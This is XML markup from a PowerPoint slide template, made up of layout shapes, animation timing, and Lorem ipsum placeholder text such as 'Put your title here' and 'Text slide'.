              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor ante.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0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569384" y="5200833"/>
            <a:ext cx="10996083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920" b="1" baseline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Put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rounded Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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3" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="77" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857384" y="4274774"/>
            <a:ext cx="2399995" cy="216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14" name="Oval 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="569384" y="4289746"/>
            <a:ext cx="240000" cy="2160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78" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857384" y="4640534"/>
            <a:ext cx="2399995" cy="216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16" name="Oval 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="569384" y="4655506"/>
            <a:ext cx="240000" cy="2160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79" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3630045" y="4274774"/>
            <a:ext cx="2399995" cy="216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18" name="Oval 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3342045" y="4289746"/>
            <a:ext cx="240000" cy="21600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80" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3630045" y="4640534"/>
            <a:ext cx="2399995" cy="216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20" name="Oval 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3342045" y="4655506"/>
            <a:ext cx="240000" cy="2160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81" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6318040" y="4274774"/>
            <a:ext cx="2399995" cy="216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22" name="Oval 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6030040" y="4289746"/>
            <a:ext cx="240000" cy="216000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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="82" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6318040" y="4640534"/>
            <a:ext cx="2399995" cy="216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24" name="Oval 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6030040" y="4655506"/>
            <a:ext cx="240000" cy="2160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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="83" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9006035" y="4274774"/>
            <a:ext cx="2399995" cy="216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26" name="Oval 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8718035" y="4289746"/>
            <a:ext cx="240000" cy="21600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84" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9006035" y="4640534"/>
            <a:ext cx="2399995" cy="216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28" name="Oval 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8718035" y="4655506"/>
            <a:ext cx="240000" cy="2160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4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4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4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2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2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2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2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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="5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2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2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2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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="6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2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2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2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="7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2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3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="8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2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2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2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3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9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2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2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2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4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10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2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2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2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5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 animBg="1"/>
      <p:bldP spid="1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animBg="1"/>
      <p:bldP spid="17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animBg="1"/>
      <p:bldP spid="1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 animBg="1"/>
      <p:bldP spid="2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animBg="1"/>
      <p:bldP spid="23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animBg="1"/>
      <p:bldP spid="2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animBg="1"/>
      <p:bldP spid="27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 animBg="1"/>
    </p:bld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content dark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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rounded Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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6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 slides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siluete-map.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="1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251" y="1143410"/>
            <a:ext cx="10972800" cy="5402555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rounded Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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6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content Clea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03251" y="324582"/>
            <a:ext cx="10972800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tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rounded Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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" name="Rounded Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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with content Cle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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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40" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603252" y="1467760"/>
            <a:ext cx="3931576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92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r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0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41" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603254" y="1949956"/>
            <a:ext cx="3931577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r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>Here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0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42" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623715" y="2280931"/>
            <a:ext cx="3910188" cy="2152280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" indent="0" algn="just" defTabSz="485140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/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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringillascipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor ante. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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viverra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ultricies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> diam. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0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64" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623714" y="5427908"/>
            <a:ext cx="3910188" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean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623714" y="4769500"/>
            <a:ext cx="3910188" cy="3453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1" baseline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smtClean="0"/>
              <a:t>RESULT 1</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0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65" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623714" y="5181089"/>
            <a:ext cx="3910188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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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4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4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4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4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4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4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4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0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content Clea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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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64" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591965" y="5563772"/>
            <a:ext cx="10973505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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus.is</a:t>
